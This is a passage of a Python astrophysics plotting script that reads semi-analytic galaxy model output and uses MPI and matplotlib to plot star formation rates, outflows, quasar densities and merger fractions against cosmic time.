leg = ax1.legend(loc='lower right', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
plt.tight_layout()
outputFile = './{0}{1}'.format(output_tag, output_format)
plt.savefig(outputFile) # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close()
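`plot_photoncount` above filters the time axis and the emissivity array in lockstep (dropping snapshots whose summed photon count is below 1.0) with paired comprehensions over `zip`, so the two lists stay aligned before taking the log. A self-contained sketch of that filtering, with hypothetical values:

```python
import numpy as np

t = np.array([100.0, 200.0, 300.0, 400.0])  # hypothetical times in Myr
nion = np.array([0.0, 0.5, 2.0, 8.0])       # hypothetical summed photon counts

# Keep only snapshots with a meaningful photon count, keeping t and nion aligned.
t_kept = [ti for ti, N in zip(t, nion) if N > 1.0]
nion_kept = [N for N in nion if N > 1.0]

# Safe to log now: every surviving entry is > 1.0, so no log10(0) warnings.
log_nion = np.log10(nion_kept)
```

Filtering before `np.log10` is what prevents the `-inf` values that zero-count snapshots would otherwise inject into the plotted curve.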
##
def plot_singleSFR(galaxies_filepath_array, merged_galaxies_filepath_array, number_snapshots, simulation_norm, model_tags, output_tag):
SFR_gal = []
SFR_ensemble = []
ejected_gal = []
ejected_ensemble = []
infall_gal = []
infall_ensemble = []
ejectedmass_gal = []
ejectedmass_ensemble = []
N_random = 1
ax1 = plt.subplot(111)
# ax3 = plt.subplot(122)
#ax5 = plt.subplot(133)
look_for_alive = 1
#idx_array = [20004, 20005, 20016]
#halonr_array = [7381]
halonr_array = [389106]
#halonr_array = [36885]
for model_number in range(0, len(model_tags)):
if(simulation_norm[model_number] == 0):
AllVars.Set_Params_Mysim()
if(simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif(simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
else:
print("Simulation norm was set to {0}.".format(simulation_norm[model_number]))
raise ValueError("This option has been implemented yet. Get your head in the game Jacob!")
SFR_gal.append([])
SFR_ensemble.append([])
ejected_gal.append([])
ejected_ensemble.append([])
infall_gal.append([])
infall_ensemble.append([])
ejectedmass_gal.append([])
ejectedmass_ensemble.append([])
GG, Gal_Desc = ReadScripts.ReadGals_SAGE_DelayedSN(galaxies_filepath_array[model_number], 0, number_snapshots[model_number], comm) # Read in the correct galaxy file.
G_Merged, Merged_Desc = ReadScripts.ReadGals_SAGE_DelayedSN(merged_galaxies_filepath_array[model_number], 0, number_snapshots[model_number], comm) # Also need the merged galaxies.
G = ReadScripts.Join_Arrays(GG, G_Merged, Gal_Desc) # Then join them together for all galaxies that existed at this Redshift.
if look_for_alive == 1:
G.GridHistory[G.GridHistory >= 0] = 1
G.GridHistory[G.GridHistory < 0] = 0
alive = np.sum(G.GridHistory, axis = 1)
# print "The galaxy that was present in the most snapshots is %d which was in %d snaps" %(np.argmax(alive), np.amax(alive))
most_alive = alive.argsort()[-10:][::-1] # Finds the 3 galaxies alive for the most snapshots. Taken from https://stackoverflow.com/questions/6910641/how-to-get-indices-of-n-maximum-values-in-a-numpy-array
# print G.HaloNr[most_alive]
t = np.empty((number_snapshots[model_number]))
for snapshot_idx in range(0, number_snapshots[model_number]):
w = np.where((G.GridHistory[:, snapshot_idx] != -1) & (G.GridStellarMass[:, snapshot_idx] > 0.0) & (G.GridStellarMass[:, snapshot_idx] < 1e5) & (G.GridFoFMass[:, snapshot_idx] >= m_low_SAGE) & (G.GridFoFMass[:, snapshot_idx] <= m_high_SAGE))[0] # Only include those galaxies that existed at the current snapshot, had positive (but not infinite) stellar/Halo mass and Star formation rate.
SFR_ensemble[model_number].append(np.mean(G.GridSFR[w,snapshot_idx]))
ejected_ensemble[model_number].append(np.mean(G.GridOutflowRate[w, snapshot_idx]))
infall_ensemble[model_number].append(np.mean(G.GridInfallRate[w, snapshot_idx]))
t[snapshot_idx] = (t_BigBang - cosmo.lookback_time(AllVars.SnapZ[snapshot_idx]).value) * 1.0e3
for p in range(0, N_random):
random_idx = (np.where((G.HaloNr == halonr_array[p]))[0])[0]
SFR_gal[model_number].append(G.GridSFR[random_idx]) # Remember the star formation rate history of the galaxy.
ejected_gal[model_number].append(G.GridOutflowRate[random_idx])
infall_gal[model_number].append(G.GridInfallRate[random_idx])
ejectedmass_gal[model_number].append(G.GridEjectedMass[random_idx])
#SFR_gal[model_number][p][SFR_gal[model_number][p] < 1.0e-15] = 1
for snapshot_idx in range(0, number_snapshots[model_number]):
if snapshot_idx == 0:
pass
elif(G.GridHistory[random_idx, snapshot_idx] == -1):
SFR_gal[model_number][p][snapshot_idx] = SFR_gal[model_number][p][snapshot_idx - 1]
# SFR_ensemble[model_number] = np.nan_to_num(SFR_ensemble[model_number])
# SFR_ensemble[model_number][SFR_ensemble[model_number] < 1.0e-15] = 1
# ejected_ensemble[model_number][ejected_ensemble[model_number] < 1.0e-15] = 1
ax1.plot(t, SFR_ensemble[model_number], color = PlotScripts.colors[0], linestyle = PlotScripts.linestyles[model_number], label = model_tags[model_number], linewidth = PlotScripts.global_linewidth)
ax1.plot(t, ejected_ensemble[model_number], color = PlotScripts.colors[1], linestyle = PlotScripts.linestyles[model_number], linewidth = PlotScripts.global_linewidth, alpha = 1.0)
#ax5.plot(t, infall_ensemble[model_number], color = PlotScripts.colors[2], linestyle = PlotScripts.linestyles[model_number], linewidth = PlotScripts.global_linewidth, alpha = 1.0)
#ax5.plot(t, ejectedmass_ensemble[model_number], color = PlotScripts.colors[2], linestyle = PlotScripts.linestyles[model_number], linewidth = PlotScripts.global_linewidth, alpha = 1.0)
for p in range(0, N_random):
ax1.plot(t, SFR_gal[model_number][p], color = PlotScripts.colors[0], linestyle = PlotScripts.linestyles[model_number], alpha = 0.5, linewidth = 1)
ax1.plot(t, ejected_gal[model_number][p], color = PlotScripts.colors[1], linestyle = PlotScripts.linestyles[model_number], alpha = 0.5, linewidth = 1)
#ax5.plot(t, infall_gal[model_number][p], color = PlotScripts.colors[2], linestyle = PlotScripts.linestyles[model_number], alpha = 0.5, linewidth = 1)
#ax5.plot(t, ejectedmass_gal[model_number][p], color = PlotScripts.colors[2], linestyle = PlotScripts.linestyles[model_number], alpha = 0.5, linewidth = 1)
#ax1.plot(t, SFR_gal[model_number][p], color = PlotScripts.colors[0], linestyle = PlotScripts.linestyles[model_number], alpha = 1.0, linewidth = 1, label = model_tags[model_number])
#ax1.plot(t, ejected_gal[model_number][p], color = PlotScripts.colors[1], linestyle = PlotScripts.linestyles[model_number], alpha = 1.0, linewidth = 1, label = model_tags[model_number])
ax1.plot(np.nan, np.nan, color = 'r', linestyle = '-', label = "SFR")
ax1.plot(np.nan, np.nan, color = 'b', linestyle = '-', label = "Outflow")
# exit()
#ax1.plot(np.nan, np.nan, color = PlotScripts.colors[0], label = 'SFR')
#ax1.plot(np.nan, np.nan, color = PlotScripts.colors[1], label = 'Outflow')
ax1.set_yscale('log', nonposy='clip')
ax1.set_ylabel(r"$\mathrm{Mass \: Flow} \: [\mathrm{M}_\odot \mathrm{yr}^{-1}]$")
ax1.set_xlabel(r"$\mathrm{Time \: Since \: Big \: Bang \: [Myr]}$", size = PlotScripts.global_fontsize)
ax1.set_xlim(PlotScripts.time_xlim)
ax1.set_ylim([1e-6, 1e3])
'''
ax3.set_yscale('log', nonposy='clip')
ax3.set_ylabel(r"$\mathrm{Outflow \: Rate} \: [\mathrm{M}_\odot \mathrm{yr}^{-1}]$")
ax3.set_xlabel(r"$\mathrm{Time \: Since \: Big \: Bang \: [Myr]}$", size = PlotScripts.global_fontsize)
ax3.set_xlim(PlotScripts.time_xlim)
ax3.set_ylim([1e-8, 1e3])
ax5.set_yscale('log', nonposy='clip')
#ax5.set_ylabel(r"$\mathrm{Infall \: Rate} \: [\mathrm{M}_\odot \mathrm{yr}^{-1}]$")
ax5.set_ylabel(r"$\mathrm{Ejected \: Mass} \: [\mathrm{M}_\odot]$")
ax5.set_xlabel(r"$\mathrm{Time \: Since \: Big \: Bang \: [Myr]}$", size = PlotScripts.global_fontsize)
ax5.set_xlim(PlotScripts.time_xlim)
#ax5.set_ylim([1e-8, 1e3])
ax5.set_ylim([1e6, 1e10])
'''
ax2 = ax1.twiny()
#ax4 = ax3.twiny()
#ax6 = ax5.twiny()
t_plot = (t_BigBang - cosmo.lookback_time(PlotScripts.z_plot).value) * 1.0e3 # Corresponding Time values on the bottom.
z_labels = ["$%d$" % x for x in PlotScripts.z_plot] # Properly Latex-ize the labels.
ax2.set_xlabel(r"$z$", size = PlotScripts.global_labelsize)
ax2.set_xlim(PlotScripts.time_xlim)
ax2.set_xticks(t_plot) # Set the ticks according to the time values on the bottom,
ax2.set_xticklabels(z_labels) # But label them as redshifts.
'''
ax4.set_xlabel(r"$z$", size = PlotScripts.global_labelsize)
ax4.set_xlim(PlotScripts.time_xlim)
ax4.set_xticks(t_plot) # Set the ticks according to the time values on the bottom,
ax4.set_xticklabels(z_labels) # But label them as redshifts.
ax6.set_xlabel(r"$z$", size = PlotScripts.global_labelsize)
ax6.set_xlim(PlotScripts.time_xlim)
ax6.set_xticks(t_plot) # Set the ticks according to the time values on the bottom,
ax6.set_xticklabels(z_labels) # But label them as redshifts.
'''
plt.tight_layout()
leg = ax1.legend(loc='lower right', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
outputFile = './Halo%d_mlow%.2f_%s%s' %(halonr_array[0], m_low_SAGE, output_tag, output_format)
plt.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close()
##
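# A minimal, self-contained sketch of the redshift-label trick used above
# (ax2 = ax1.twiny() with time ticks relabelled as redshifts).  The helper
# name is hypothetical; in the script proper the times come from
# AllVars/astropy rather than being passed in directly.
def redshift_ticks(t_BigBang_Gyr, lookback_Gyr, z_plot):
    """Return (tick_positions_Myr, latex_labels) for a twiny redshift axis.

    Each redshift's tick sits at the age of the Universe at that redshift,
    converted from Gyr to Myr to match the bottom (time) axis.
    """
    ticks = [(t_BigBang_Gyr - lb) * 1.0e3 for lb in lookback_Gyr]
    labels = ["$%d$" % z for z in z_plot]  # Latex-ized, matching the style above.
    return ticks, labels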
def plot_quasars_count(SnapList, PlotList, N_quasars_z, N_quasars_boost_z, N_gal_z, mean_quasar_activity, std_quasar_activity, N_halo, N_merger_halo, N_gal, N_merger_galaxy, fesc_prescription, simulation_norm, FirstFile, LastFile, NumFile, model_tags, output_tag):
'''
Parameters
----------
SnapList : Nested `array-like` of ints, SnapList[model_number0] = [snapshot0_model0, ..., snapshotN_model0], with length equal to the number of models.
Snapshots that we plot the quasar density at for each model.
PlotList : Nested array of ints, PlotList[model_number0] = [plotsnapshot0_model0, ..., plotsnapshotN_model0], with length equal to the number of models.
Snapshots that will be plotted for the quasar activity as a function of halo mass.
N_quasars_z : Nested array of floats, N_quasars_z[model_number0] = [N_quasars_z0, N_quasars_z1, ..., N_quasars_zN]. Outer array has length equal to the number of models, inner array has length equal to length of the model's SnapList.
Number of quasars that went off (i.e., new quasar events) during the given redshift.
N_quasars_boost_z : Nested array of floats, N_quasars_boost_z[model_number0] = [N_quasars_boost_z0, N_quasars_boost_z1, ..., N_quasars_boost_zN]. Outer array has length equal to the number of models, inner array has length equal to length of the model's SnapList.
Number of galaxies that had their escape fraction boosted by quasar activity.
N_gal_z : Nested array of floats, N_gal_z[model_number0] = [N_gal_z0, N_gal_z1, ..., N_gal_zN]. Outer array has length equal to the number of models, inner array has length equal to length of the model's SnapList.
Number of galaxies at each redshift.
mean_quasar_activity, std_quasar_activity : Nested 2-dimensional array of floats, mean_quasar_activity[model_number0][snapshot0] = [bin0quasar_activity, ..., binNquasar_activity]. Outer array has length equal to the number of models, the next has length equal to the length of the model's SnapList, and the inner-most has length equal to the number of halo bins (NB).
Mean/std fraction of galaxies that had a quasar go off during each snapshot, as a function of halo mass.
NOTE : This is for quasars going off, not for galaxies that have their escape fraction boosted.
fesc_prescription : Array with length equal to the number of models.
Denotes what escape fraction prescription each model used. Quasars are only tracked when fesc_prescription == 3.
simulation_norm : array with length equal to the number of models.
Denotes which simulation each model uses.
0 : MySim
1 : Mini-Millennium
2 : Tiamat (down to z = 5)
3 : Extended Tiamat (down to z ~ 1.6).
4 : Britton's Simulation
5 : Kali
FirstFile, LastFile, NumFile : array of integers with length equal to the number of models.
The file numbers for each model that were read in (defined by the range between [FirstFile, LastFile] inclusive) and the TOTAL number of files for this model (we may only be plotting a subset of the volume).
model_tags : array of strings with length equal to the number of models.
Strings that contain the tag for each model. Will be placed on the plot.
output_tag : string
Name of the file that will be generated. The file will be saved in the current directory with the output format defined by the 'output_format' variable at the beginning of the file.
Returns
-------
No returns.
Generates and saves the plot (named via output_tag).
Units
-----
No relevant units.
'''
print("Plotting quasar count/density")
if rank == 0:
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax6 = ax1.twinx()
fig2 = plt.figure()
ax3 = fig2.add_subplot(111)
ax5 = ax3.twinx()
fig3 = plt.figure()
ax7 = fig3.add_subplot(111)
fig4 = plt.figure()
ax50 = fig4.add_subplot(111)
fig5 = plt.figure()
ax55 = fig5.add_subplot(111)
fig6 = plt.figure()
ax56 = fig6.add_subplot(111)
mean_quasar_activity_array = []
std_quasar_activity_array = []
N_quasar_activity_array = []
N_gal_halo_array = []
N_gal_array = []
merger_counts_halo_array = []
merger_counts_galaxy_array = []
bin_middle_halo_array = []
bin_middle_galaxy_array = []
for model_number in range(0, len(SnapList)): # Does this for each of the models.
if (fesc_prescription[model_number] != 3): # Want to skip the models that didn't count quasars.
continue
## Normalization for each model. ##
if (simulation_norm[model_number] == 0):
AllVars.Set_Params_Mysim()
elif (simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif (simulation_norm[model_number] == 2):
AllVars.Set_Params_Tiamat()
elif (simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
elif (simulation_norm[model_number] == 4):
AllVars.Set_Params_Britton()
elif (simulation_norm[model_number] == 5):
AllVars.Set_Params_Kali()
mean_quasar_activity_array.append([])
std_quasar_activity_array.append([])
N_quasar_activity_array.append([])
N_gal_halo_array.append([])
N_gal_array.append([])
merger_counts_halo_array.append([])
merger_counts_galaxy_array.append([])
bin_middle_halo_array.append([])
bin_middle_galaxy_array.append([])
box_factor = (LastFile[model_number] - FirstFile[model_number] + 1.0)/(NumFile[model_number]) # This factor allows us to take a sub-volume of the box and scale the results to represent the entire box.
print("We are plotting the quasar density using {0:.4f} of the box's volume.".format(box_factor))
norm = pow(AllVars.BoxSize,3) / pow(AllVars.Hubble_h, 3) * box_factor
####
## We perform the plotting on Rank 0 so only this rank requires the final counts array. ##
if rank == 0:
quasars_total = np.zeros_like((N_quasars_z[model_number]))
boost_total = np.zeros_like(N_quasars_boost_z[model_number])
gal_count_total = np.zeros_like(N_gal_z[model_number])
else:
quasars_total = None
boost_total = None
gal_count_total = None
N_quasars_tmp = np.array((N_quasars_z[model_number])) # So we can use MPI.Reduce()
comm.Reduce([N_quasars_tmp, MPI.DOUBLE], [quasars_total, MPI.DOUBLE], op = MPI.SUM, root = 0) # Sum the number of quasars and pass back to rank 0.
N_quasars_boost_tmp = np.array(N_quasars_boost_z[model_number]) # So we can use MPI.Reduce()
comm.Reduce([N_quasars_boost_tmp, MPI.DOUBLE], [boost_total, MPI.DOUBLE], op = MPI.SUM, root = 0) # Sum the number of galaxies that had their fesc boosted.
N_gal_tmp = np.array(N_gal_z[model_number]) # So we can use MPI.Reduce()
comm.Reduce([N_gal_tmp, MPI.DOUBLE], [gal_count_total, MPI.DOUBLE], op = MPI.SUM, root = 0) # Sum the number of total galaxies.
for snapshot_idx in range(len(SnapList[model_number])):
mean_quasar_activity_array[model_number], std_quasar_activity_array[model_number], N_quasar_activity_array[model_number] = calculate_pooled_stats(mean_quasar_activity_array[model_number], std_quasar_activity_array[model_number], N_quasar_activity_array[model_number], mean_quasar_activity[model_number][snapshot_idx], std_quasar_activity[model_number][snapshot_idx], N_halo[model_number][snapshot_idx])
if rank == 0:
merger_count_halo_total = np.zeros_like((N_merger_halo[model_number][snapshot_idx]))
N_gal_halo_total = np.zeros_like((N_halo[model_number][snapshot_idx]))
merger_count_galaxy_total = np.zeros_like((N_merger_galaxy[model_number][snapshot_idx]))
N_gal_total = np.zeros_like((N_gal[model_number][snapshot_idx]))
else:
merger_count_halo_total = None
N_gal_halo_total = None
merger_count_galaxy_total = None
N_gal_total = None
comm.Reduce([N_merger_halo[model_number][snapshot_idx], MPI.FLOAT], [merger_count_halo_total, MPI.FLOAT], op = MPI.SUM, root = 0) # Sum the halo merger counts and pass to Rank 0.
comm.Reduce([N_halo[model_number][snapshot_idx], MPI.FLOAT], [N_gal_halo_total, MPI.FLOAT], op = MPI.SUM, root = 0) # Sum the galaxy counts binned on halo mass and pass to Rank 0.
comm.Reduce([N_merger_galaxy[model_number][snapshot_idx], MPI.FLOAT], [merger_count_galaxy_total, MPI.FLOAT], op = MPI.SUM, root = 0) # Sum the galaxy merger counts and pass to Rank 0.
comm.Reduce([N_gal[model_number][snapshot_idx], MPI.FLOAT], [N_gal_total, MPI.FLOAT], op = MPI.SUM, root = 0) # Sum the galaxy counts binned on stellar mass and pass to Rank 0.
if rank == 0:
merger_counts_halo_array[model_number].append(merger_count_halo_total)
N_gal_halo_array[model_number].append(N_gal_halo_total)
merger_counts_galaxy_array[model_number].append(merger_count_galaxy_total)
N_gal_array[model_number].append(N_gal_total)
bin_middle_halo_array[model_number].append(np.arange(m_low, m_high+bin_width, bin_width)[:-1] + bin_width * 0.5)
bin_middle_galaxy_array[model_number].append(np.arange(m_gal_low, m_gal_high+bin_width, bin_width)[:-1] + bin_width * 0.5)
if rank == 0:
plot_count = 0
stop_plot = 0
title = model_tags[model_number]
t = np.empty(len(SnapList[model_number]))
ZZ = np.empty(len(SnapList[model_number]))
for snapshot_idx in range(0, len(SnapList[model_number])):
t[snapshot_idx] = (AllVars.t_BigBang - AllVars.Lookback_Time[SnapList[model_number][snapshot_idx]]) * 1.0e3
ZZ[snapshot_idx] = AllVars.SnapZ[SnapList[model_number][snapshot_idx]]
if (stop_plot == 0):
# print("Snapshot {0} PlotSnapshot "
#"{1}".format(SnapList[model_number][snapshot_idx], PlotList[model_number][plot_count]))
if (SnapList[model_number][snapshot_idx] == PlotList[model_number][plot_count]):
label = "z = {0:.2f}".format(AllVars.SnapZ[PlotList[model_number][plot_count]])
ax7.plot(bin_middle_halo_array[model_number][snapshot_idx], mean_quasar_activity_array[model_number][snapshot_idx], color = PlotScripts.colors[plot_count], linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = label, linewidth = PlotScripts.global_linewidth)
#ax50.plot(bin_middle_halo_array[model_number][snapshot_idx], merger_counts_array[model_number][snapshot_idx] / gal_count_total[snapshot_idx], color = PlotScripts.colors[plot_count], linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = label, linewidth = PlotScripts.global_linewidth)
ax50.plot(bin_middle_halo_array[model_number][snapshot_idx], merger_counts_halo_array[model_number][snapshot_idx], color = PlotScripts.colors[plot_count], linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = label, linewidth = PlotScripts.global_linewidth)
#ax50.plot(bin_middle_halo_array[model_number][snapshot_idx], merger_counts_array[model_number][snapshot_idx] / N_gal_halo_array[model_number][snapshot_idx], color = PlotScripts.colors[plot_count], linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = label, linewidth = PlotScripts.global_linewidth)
#ax55.plot(bin_middle_galaxy_array[model_number][snapshot_idx], merger_counts_galaxy_array[model_number][snapshot_idx], color = PlotScripts.colors[plot_count], linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = label, linewidth = PlotScripts.global_linewidth)
ax55.plot(bin_middle_galaxy_array[model_number][snapshot_idx],
merger_counts_galaxy_array[model_number][snapshot_idx] / N_gal_array[model_number][snapshot_idx], color = PlotScripts.colors[plot_count], linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = label, linewidth = PlotScripts.global_linewidth)
print("plot_count = {0} len(PlotList) = {1}".format(plot_count,
len(PlotList[model_number])))
plot_count += 1
if (plot_count == len(PlotList[model_number])):
stop_plot = 1
print("For Snapshot {0} at t {3} there were {1} total mergers compared to {2} total galaxies.".format(snapshot_idx, np.sum(merger_counts_galaxy_array[model_number][snapshot_idx]), np.sum(gal_count_total[snapshot_idx]), t[snapshot_idx]))
if (np.sum(gal_count_total[snapshot_idx]) > 0.0 and np.sum(merger_counts_galaxy_array[model_number][snapshot_idx]) > 0.0):
ax56.scatter(t[snapshot_idx], np.sum(merger_counts_galaxy_array[model_number][snapshot_idx]) / np.sum(gal_count_total[snapshot_idx]), color = 'r', rasterized = True)
#ax56.scatter(t[snapshot_idx], quasars_total[snapshot_idx] / np.sum(gal_count_total[snapshot_idx]), color = 'r', rasterized = True)
ax1.plot(t, quasars_total / norm, color = PlotScripts.colors[model_number], linestyle = PlotScripts.linestyles[0], rasterized = True, linewidth = PlotScripts.global_linewidth)
p = np.where((ZZ < 15))[0]
#ax1.plot(ZZ[p], quasars_total[p] / norm, color = PlotScripts.colors[model_number], linestyle = PlotScripts.linestyles[0], rasterized = True, linewidth = PlotScripts.global_linewidth)
ax3.plot(t, boost_total, color = PlotScripts.colors[model_number], linestyle = PlotScripts.linestyles[0], rasterized = True, label = title, linewidth = PlotScripts.global_linewidth)
w = np.where((gal_count_total > 0.0))[0] # Since we're doing a division, need to only plot those redshifts that actually have galaxies.
ax5.plot(t[w], np.divide(boost_total[w], gal_count_total[w]), color = PlotScripts.colors[model_number], linestyle = PlotScripts.linestyles[1], rasterized = True, linewidth = PlotScripts.global_linewidth)
ax6.plot(t[w], gal_count_total[w] / norm, color = PlotScripts.colors[model_number], linestyle = PlotScripts.linestyles[1], rasterized = True, linewidth = PlotScripts.global_linewidth)
#ax6.plot(ZZ[p], gal_count_total[p] / norm, color = PlotScripts.colors[model_number], linestyle = PlotScripts.linestyles[1], rasterized = True, linewidth = PlotScripts.global_linewidth)
ax1.plot(np.nan, np.nan, color = PlotScripts.colors[0], linestyle = PlotScripts.linestyles[0], label = "Quasar Ejection Density")
ax1.plot(np.nan, np.nan, color = PlotScripts.colors[0], linestyle = PlotScripts.linestyles[1], label = "Galaxy Density")
ax3.plot(np.nan, np.nan, color = 'k', linestyle = PlotScripts.linestyles[0], label = "Count")
ax3.plot(np.nan, np.nan, color = 'k', linestyle = PlotScripts.linestyles[1], label = "Fraction of Galaxies")
ax7.set_xlabel(r'$\log_{10}\ M_\mathrm{vir}\ [M_{\odot}]$', size = PlotScripts.global_fontsize)
ax7.set_ylabel(r'$\mathrm{Mean \: Quasar \: Activity}$', size = PlotScripts.global_fontsize)
ax50.set_xlabel(r'$\log_{10}\ M_\mathrm{vir}\ [M_{\odot}]$', size = PlotScripts.global_fontsize)
#ax50.set_ylabel(r'$\mathrm{Fraction \: Galaxies \: Undergoing \: Merger}$', size = PlotScripts.global_fontsize)
ax50.set_ylabel(r'$\mathrm{Number \: Galaxies \: Undergoing \: Merger}$', size = PlotScripts.global_fontsize)
ax55.set_xlabel(r'$\log_{10}\ M_\mathrm{*}\ [M_{\odot}]$', size = PlotScripts.global_fontsize)
ax55.set_ylabel(r'$\mathrm{Fraction \: Galaxies \: Undergoing \: Merger}$', size = PlotScripts.global_fontsize)
#ax55.set_ylabel(r'$\mathrm{Number \: Galaxies \: Undergoing \: Merger}$', size = PlotScripts.global_fontsize)
ax56.set_xlabel(r"$\mathrm{Time \: Since \: Big \: Bang \: [Myr]}$", size = PlotScripts.global_labelsize)
ax56.set_ylabel(r'$\mathrm{Fraction \: Galaxies \: Undergoing \: Merger}$', size = PlotScripts.global_fontsize)
#ax56.set_ylabel(r'$\mathrm{Fraction \: Galaxies \: Quasar \: Activity}$', size = PlotScripts.global_fontsize)
ax56.set_yscale('log', nonposy='clip')
ax50.axvline(np.log10(32.0*AllVars.PartMass / AllVars.Hubble_h), color = 'k', linewidth = PlotScripts.global_linewidth, linestyle = '-.')
ax1.xaxis.set_minor_locator(mtick.MultipleLocator(PlotScripts.time_tickinterval))
ax1.set_xlim(PlotScripts.time_xlim)
ax1.set_yscale('log', nonposy='clip')
ax3.xaxis.set_minor_locator(mtick.MultipleLocator(PlotScripts.time_tickinterval))
ax3.set_xlim(PlotScripts.time_xlim)
ax3.set_yscale('log', nonposy='clip')
## Create a second axis at the top that contains the corresponding redshifts. ##
## The redshift defined in the variable 'z_plot' will be displayed. ##
ax2 = ax1.twiny()
ax4 = ax3.twiny()
ax57 = ax56.twiny()
t_plot = (AllVars.t_BigBang - AllVars.cosmo.lookback_time(PlotScripts.z_plot).value) * 1.0e3 # Corresponding time values on the bottom.
z_labels = ["$%d$" % x for x in PlotScripts.z_plot] # Properly Latex-ize the labels.
ax2.set_xlabel(r"$z$", size = PlotScripts.global_labelsize)
ax2.set_xlim(PlotScripts.time_xlim)
ax2.set_xticks(t_plot) # Set the ticks according to the time values on the bottom,
ax2.set_xticklabels(z_labels) # But label them as redshifts.
ax4.set_xlabel(r"$z$", size = PlotScripts.global_labelsize)
ax4.set_xlim(PlotScripts.time_xlim)
ax4.set_xticks(t_plot) # Set the ticks according to the time values on the bottom,
ax4.set_xticklabels(z_labels) # But label them as redshifts.
ax57.set_xlabel(r"$z$", size = PlotScripts.global_labelsize)
ax57.set_xlim(PlotScripts.time_xlim)
ax57.set_xticks(t_plot) # Set the ticks according to the time values on the bottom,
ax57.set_xticklabels(z_labels) # But label them as redshifts.
ax1.set_xlabel(r"$\mathrm{Time \: Since \: Big \: Bang \: [Myr]}$", size = PlotScripts.global_labelsize)
#ax1.set_xlabel(r"$z$", size = PlotScripts.global_labelsize)
ax1.set_ylabel(r'$N_\mathrm{Quasars} \: [\mathrm{Mpc}^{-3}]$', fontsize = PlotScripts.global_fontsize)
ax6.set_ylabel(r'$N_\mathrm{Gal} \: [\mathrm{Mpc}^{-3}]$', fontsize = PlotScripts.global_fontsize)
ax3.set_xlabel(r"$\mathrm{Time \: Since \: Big \: Bang \: [Myr]}$", size = PlotScripts.global_labelsize)
ax3.set_ylabel(r'$N_\mathrm{Boosted}$', fontsize = PlotScripts.global_fontsize)
ax5.set_ylabel(r'$\mathrm{Fraction \: Boosted}$', fontsize = PlotScripts.global_fontsize)
leg = ax1.legend(loc='lower right', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
leg = ax3.legend(loc='lower left', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
leg = ax7.legend(loc='upper left', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
leg = ax50.legend(loc='upper right', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
leg = ax55.legend(loc='upper right', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
fig.tight_layout()
fig2.tight_layout()
fig3.tight_layout()
fig4.tight_layout()
fig5.tight_layout()
fig6.tight_layout()
outputFile1 = './{0}_quasardensity{1}'.format(output_tag, output_format)
outputFile2 = './{0}_boostedcount{1}'.format(output_tag, output_format)
outputFile3 = './{0}_quasar_activity_halo{1}'.format(output_tag, output_format)
outputFile4 = './{0}_mergercount_global{1}'.format(output_tag, output_format)
outputFile5 = './{0}_mergercount_global_stellarmass{1}'.format(output_tag, output_format)
outputFile6 = './{0}_mergercount_total{1}'.format(output_tag, output_format)
fig.savefig(outputFile1) # Save the figure
fig2.savefig(outputFile2) # Save the figure
fig3.savefig(outputFile3) # Save the figure
fig4.savefig(outputFile4) # Save the figure
fig5.savefig(outputFile5) # Save the figure
fig6.savefig(outputFile6) # Save the figure
print("Saved to {0}".format(outputFile1))
print("Saved to {0}".format(outputFile2))
print("Saved to {0}".format(outputFile3))
print("Saved to {0}".format(outputFile4))
print("Saved to {0}".format(outputFile5))
print("Saved to {0}".format(outputFile6))
plt.close(fig)
plt.close(fig2)
plt.close(fig3)
plt.close(fig4)
plt.close(fig5)
plt.close(fig6)
##
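# The quasar/galaxy densities above are normalised by a comoving volume scaled
# to the fraction of files actually read.  A sketch of that normalisation as a
# standalone (hypothetical) helper; box_size is in Mpc/h, so dividing by h^3
# gives Mpc^3:
def subvolume_norm(box_size, hubble_h, first_file, last_file, num_files):
    """Comoving volume in Mpc^3 represented by files [first_file, last_file]."""
    box_factor = (last_file - first_file + 1.0) / num_files  # Fraction of the box read.
    return pow(box_size, 3) / pow(hubble_h, 3) * box_factor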
def plot_photon_quasar_fraction(snapshot, filenr, output_tag, QuasarFractionalPhoton, QuasarActivityToggle, NumSubsteps):
ax1 = plt.subplot(111)
counts, bin_edges, bin_middle = AllVars.Calculate_Histogram(QuasarFractionalPhoton, 0.05, 0, 0, 1)
ax1.plot(bin_middle, counts, lw = PlotScripts.global_linewidth, color = 'r')
ax1.axvline(np.mean(QuasarFractionalPhoton[QuasarFractionalPhoton != 0]), lw = 0.5, ls = '-')
ax1.set_yscale('log', nonposy='clip')
ax1.set_xlabel(r"$\mathrm{Fractional \: Photon \: Boost}$")
ax1.set_ylabel(r"$\mathrm{Count}$")
ax1.set_ylim([1e1, 1e5])
